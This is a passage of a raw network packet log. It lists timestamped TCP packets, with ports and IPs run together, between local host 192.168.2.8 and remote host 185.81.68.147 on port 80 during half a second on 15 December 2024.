                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.122345924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.122731924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.123759985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.123882055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.124362946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.125559092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.125663042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.126116037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.127391100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.127468109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.127603054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.129034042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.129158020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.129304886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.131067038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.131179094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.131320000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.132925034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.133024931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.133157015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.134191036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.134258986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.134471893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.135901928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.136081934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.136501074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.137617111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.137687922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.137831926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.139234066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.139334917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.139478922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.140885115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.140995979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.141135931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.142518044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.142621994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.142781019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.144160032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.144268990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.144409895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.145788908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.145878077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.145962000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.147382021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.147480011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.147591114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.148988962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.149116039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.149221897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.150562048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.150636911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.150697947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.152154922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.152264118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.152378082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.153784037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.153909922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.154076099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.155297041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.155412912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.155545950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.156888008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.156964064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.156997919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.157896996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.158020973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.158154964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.158814907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.158932924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.159219027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.159790993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.159836054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.159964085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.160839081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.160887003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.161036015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.161478996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.161587000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.161720991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.162497044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.162621975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.163191080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.163305044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.163391113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.163562059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.164202929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.164313078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.164347887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.165141106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.165332079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.165379047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.166038036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.166152954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.166188955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.166948080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.167082071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.167335033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.167889118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.168011904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.168802977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.168880939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.168880939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.168925047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.169725895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.169831991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.170226097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.170653105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.170692921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.171286106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.171861887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.172348976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.287846088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.287945986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.288122892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.288374901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.288492918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.288660049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.289190054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.289313078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.289554119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.290098906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.290225983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.291033983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.291152000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.291187048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.291980028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.292020082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.292108059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.292151928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.292901993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.292983055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.293809891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.293910980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.293926954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.294703960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.294822931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.294862986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.294862986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.295969009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.296071053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.296390057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.296844959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.296927929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.297123909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.297945023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.298022032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.298204899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.298784018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.298855066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.299649954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.299789906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.299827099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.300653934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.300745010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.300790071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.300790071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.301440954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.301552057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.301758051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.302225113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.302356005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.302545071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.303102016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.303225040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.303958893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.304033995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.304080963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.304080963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.304815054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.304927111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.305726051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.305835962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.305879116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.305879116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.306689024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.306785107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.307738066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.307883024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.307888031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.308557987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.308631897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.308685064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.308685064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.309412956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.309536934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.309683084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.310435057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.310617924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.310844898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.311377048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.311450005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.312166929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.312277079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.312417984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.313101053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.313163042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.313241959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.313241959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.314023972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.314280987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.314439058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.314968109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.315063000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.315252066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.315851927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.315968037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.316800117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.316889048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.316920042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.317723989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.317881107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.317919016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.317981958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.318696022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.318825006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.319000959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.319714069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.319792032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.319914103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.320463896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.320576906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.321362972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.321466923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.321533918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.321580887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.322299957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.322402954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.323193073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.323335886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.323379040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.324194908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.324338913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.324522018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.325086117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.325098038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.325226068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.325345993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.326385975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.326407909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.326550007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.326894999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.339463949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.339485884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.339659929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.339912891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.340048075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.340164900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.340714931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.340794086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.341119051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.341367960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.341428041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.341473103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.341918945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.342014074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.342168093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.342709064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.342962980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.343086958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.343697071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.343800068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.343802929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.344456911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.344563007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.344567060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.345298052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.345366955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.345474005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.346012115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.346050978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.346179962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.480916023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.480947971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.481158972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.481250048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.481332064 CET8049709185.81.68.147192.168.2.8
